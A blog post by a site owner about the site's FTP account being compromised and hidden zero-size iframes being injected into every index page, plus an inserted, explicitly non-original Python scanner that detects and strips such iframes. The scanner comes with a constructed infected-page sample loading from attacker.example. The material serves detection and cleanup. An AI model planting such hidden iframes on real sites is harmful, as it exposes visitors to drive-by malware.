And Just to Prove the Point…

Monday, I wrote a post about some of the latest trends in cyber crime.

Tuesday afternoon, our Web site was hacked.

We didn’t realize it until we landed on the Google blacklist this morning, although I should have suspected something when I noticed, on Tuesday afternoon, that both of our two instances of WordPress – the one that powers this blog, and the one that powers our “News” page – had stopped working. But, since I knew that I was a couple of revisions behind, I elected to upgrade my WordPress instances to the latest release. When they came back up working again, I didn’t probe any deeper. I should have known better.

Log analysis indicates that our FTP account was compromised. Beginning at about 3:18 pm PDT on Tuesday afternoon, a series of files were uploaded to our server from an IP address that appears to be located somewhere in the UK (in the London area, to be more precise). The file transfers were done using the FTP account for our domain. They went through our site and changed every index.* page. Specifically, they placed a “hidden iframe” immediately following the <body> tag.

For those who aren’t conversant with HTML, you can think of an “iframe” as a window on a Web page that displays content from another Web page. In this case, the height, width, and border width of that window were all set to “0,” so when your browser loaded a page from our site it also fetched the content from the other site, but nothing was visible on the page. That content was, in all likelihood, a page built to probe your browser and its plug-ins for unpatched vulnerabilities and, if it found one, to install malware. The hidden iframe itself isn’t the exploit; it’s the delivery mechanism, and it is one of the most common ones out there. It is the building block of “drive-by” malware campaigns, where the bad guys plant their hidden iframe on as many legitimate sites as possible and then wait for visitors. When you visit one of those sites, your browser fetches the attacker’s code automatically, and from there it’s a matter of how good the defenses on your PC are. If you run a site, the thing to look for is an iframe with zero height and width (or one hidden with CSS such as display:none) that loads content from a domain you don’t recognize, typically sitting right after the <body> tag in every index page.
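As an added example (not code from the original post, and not the tooling the author used), here is a small Python scanner for the injection pattern just described: it walks a document root, parses every index.* page, reports iframes that are sized 0x0 or hidden by CSS (noting whether they sit right after <body> and load from a foreign host), and can strip the 0x0 ones. The sample HTML, the site hostname www.example.com and the attacker.example domain are constructed for illustration.

```python
"""Hunt for hidden-iframe injections in a site's index.* pages.

Added example; the file layout, hostnames and sample page below are
assumptions, not taken from the compromised site in the post.
"""
import re
from html.parser import HTMLParser
from pathlib import Path
from urllib.parse import urlparse

HIDDEN_CSS = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)


def _is_zero(value):
    """True for attribute values such as "0", "0px" or " 0 "."""
    return value is not None and re.match(r"\s*0+(?:px)?\s*$", value) is not None


class HiddenIframeFinder(HTMLParser):
    """Collect iframes that are invisible, with context on where and what they load."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []
        self._just_after_body = False  # True only until the first element after <body>

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "body":
            self._just_after_body = True
            return
        if tag == "iframe":
            reasons = []
            if _is_zero(a.get("width")) or _is_zero(a.get("height")):
                reasons.append("zero width/height")
            if HIDDEN_CSS.search(a.get("style", "")):
                reasons.append("hidden via CSS")
            host = (urlparse(a.get("src", "")).hostname or "").lower()
            if host and host != self.site_host:
                reasons.append(f"external src {host}")
            if self._just_after_body:
                reasons.append("placed immediately after <body>")
            # Only invisible iframes are reported; an external src alone is normal (embeds).
            if "zero width/height" in reasons or "hidden via CSS" in reasons:
                line, col = self.getpos()
                self.findings.append(
                    {"line": line, "col": col, "src": a.get("src", ""), "reasons": reasons}
                )
        # Any element other than <body> itself closes the "immediately after <body>" window.
        self._just_after_body = False


def scan_html(text, site_host):
    """Return a list of finding dicts for one page's HTML."""
    finder = HiddenIframeFinder(site_host)
    finder.feed(text)
    finder.close()
    return finder.findings


def scan_site(root, site_host):
    """Walk a document root; return {path: findings} for every index.* page with a hit."""
    hits = {}
    for path in Path(root).rglob("index.*"):
        findings = scan_html(path.read_text(errors="replace"), site_host)
        if findings:
            hits[str(path)] = findings
    return hits


# Rough remediation for exactly the 0x0 pattern. Prefer restoring from a clean
# backup: this removes the iframe element only and cannot undo anything else
# the attacker may have changed in the same upload.
ZERO_IFRAME = re.compile(
    r"<iframe\b[^>]*\b(?:width|height)\s*=\s*[\"']?0+(?:px)?[\"']?[^>]*>\s*</iframe>",
    re.I | re.S,
)


def strip_zero_iframes(text):
    """Delete every <iframe ...></iframe> whose width or height attribute is 0."""
    return ZERO_IFRAME.sub("", text)


# Constructed sample of an infected page (not the real compromised page).
SAMPLE_INFECTED = (
    '<html><head><title>Home</title></head>\n'
    '<body><iframe src="http://attacker.example/in.php" width="0" height="0" frameborder="0"></iframe>\n'
    '<h1>Welcome</h1>\n'
    '<iframe src="https://www.youtube.com/embed/abc" width="560" height="315"></iframe>\n'
    '</body></html>\n'
)

if __name__ == "__main__":
    for f in scan_html(SAMPLE_INFECTED, "www.example.com"):
        print(f"line {f['line']}: {f['src']} ({', '.join(f['reasons'])})")
    print(strip_zero_iframes(SAMPLE_INFECTED))
```

Run it against a real document root with scan_site("/var/www/html", "www.example.com") (the path is an assumption). Treat any external host it reports as an indicator: search your web server and FTP logs for the same string, because the same campaign usually touches more than the index pages.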

Obviously, we’ve changed the FTP account credentials. But, frankly, we’re still not sure how the account was compromised in the first place. It was a pretty strong password, and not one that you’d expect to fall victim to a dictionary attack. We’ve been running malware scans on the machines that we normally use when we work on the Web site, and have yet to come up with a “smoking gun” that would explain how the credentials were compromised.

So…what to take away from this? First of all, it’s no fun to become a statistic. Second, nobody is immune to this sort of thing. Even the CBS News Web site was hit by an iframe attack not that long ago. Nobody is too big or too small to be targeted. Third, change your passwords regularly, even if you think you have strong ones. Fourth, be suspicious when something unusual happens. I should have dug deeper Tuesday afternoon, but it was late in the day when it happened, and I settled for what looked like an easy fix. Finally, it’s a pain in the you-know-what to go through and clean up the aftermath of something like this. It’s cost me most of today, plus we’ve been on the Google blacklist all day and probably won’t come off of it until sometime tomorrow when they’ve had time to re-scan our site.

The bad guys are out there, and they do want your stuff. Be careful.
